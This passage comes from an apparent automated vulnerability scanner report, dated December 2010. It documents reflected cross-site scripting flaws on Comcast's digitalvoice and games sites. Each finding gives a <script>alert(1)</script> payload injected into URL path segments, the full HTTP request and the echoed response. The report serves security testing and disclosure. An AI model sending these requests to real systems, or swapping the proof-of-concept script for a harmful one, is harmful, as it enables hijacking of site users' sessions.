GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:26 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLG0hxvHk7cTJp1GQTnh4lbJxLx1yM1vxnGwfJsXnLG7TPBDQWY!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ</td>
...[SNIP]...

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload deaea<script>alert(1)</script>082bf320537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQqxQ6GV11Wbvp5zS1tmnwpCMblny22XTm5hTLj62pTzBBLTzp!1325758820!-794401224; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3c14<script>alert(1)</script>a205b4c0e20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQVZrBhsxLHvRGZ7hjLppY1FSHbwjwnghLQvQr7Hkmvlv2psph!-1185923515!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7d6c8<script>alert(1)</script>59ccf0b3972 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:21 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLBZywMQ5KZD1CY2LT4c83KM57j22ZpLv086n72VFqgPX1MfzVl!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3524ac4ba0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLChgQ8y1G1dPYKTygvH2hCR8L8TCS2Z19K9hGN65LJT4QPlKFs!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 593da<script>alert(1)</script>3df36c0971c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCBFvV0TtBGyktZLC8Cpcqv6pQF5YvJ4bLYvyLBrvVY9WPpp1R!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward</td>
...[SNIP]...

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload ccf40<script>alert(1)</script>5f3c611fd1b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDCKh5dhsLnJpQzVGdbxBhypmqxPlvN8nXxLphc40hhK63M1d1!-762166285!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward</td>
...[SNIP]...

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ebcc<script>alert(1)</script>7145250d0fb was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGJ0t925k4LGfzSv9KJgLZvp8GSmvK2Qm17zLpwB3gMqb8SNT2!1440925265!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward</td>
...[SNIP]...

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5e48<script>alert(1)</script>3f458fc69de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0n7bqgh3SCLdr8Bl4nTXbxcrJJS3WwGhnRXMpBgtG0hqnGpTG!1720433980!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cace<script>alert(1)</script>b153324f0b2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0p52J2YLphJQzvjn6FTv1cp2bRWLnzMwwRS13gQwSVJQJBLv5!255318197!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0534<script>alert(1)</script>172078c0b3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:49 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ1CdjbT1DwVJxRtccGHqvK10Lst22t7mG6J4pqHP91jQ1xpMVn!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92a58<script>alert(1)</script>bc3efa62431 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2XPTsT4v53gHrGvVkMdxdJxJvWFDBJDbpvMdTMvDFQ2kpwpyW!739888278!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6575b<script>alert(1)</script>7a29b212314 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2KBT12YyTvcKwnw25vN2nJLrsGFPfhDWwhDnxL2crXn7cSmR7!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 9ef06<script>alert(1)</script>9e07f1fca61 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ3N1q4GLJdLQygnB9hvpMH2PtXsK6TvZjqKg4MJvDQWfzgvzTZ!-794401224!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile</td>
...[SNIP]...

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6da7<script>alert(1)</script>89a6fcaa71e was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ4bZFGbpQFyZhzMWdTJNg5Hqlj6nplKLpGWGBG52GV6mRKl4n3!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile</td>
...[SNIP]...

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cf871</noscript><script>alert(1)</script>4d1710b7efc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:59 GMT
Server: Apache
Set-Cookie: ssid=l660jf072c1iro0jfao7h6jer0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Content-Length: 622
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc was not found on this server.</p>
...[SNIP]...

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between NOSCRIPT tags. The payload b01e2</noscript><script>alert(1)</script>694556b43e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:58 GMT
Server: Apache
Set-Cookie: ssid=usip5la3bnjejo41vpfbf4gv61; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Content-Length: 623
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 was not found on this server.</p>
...[SNIP]...

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3d790</noscript><script>alert(1)</script>7026214fdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

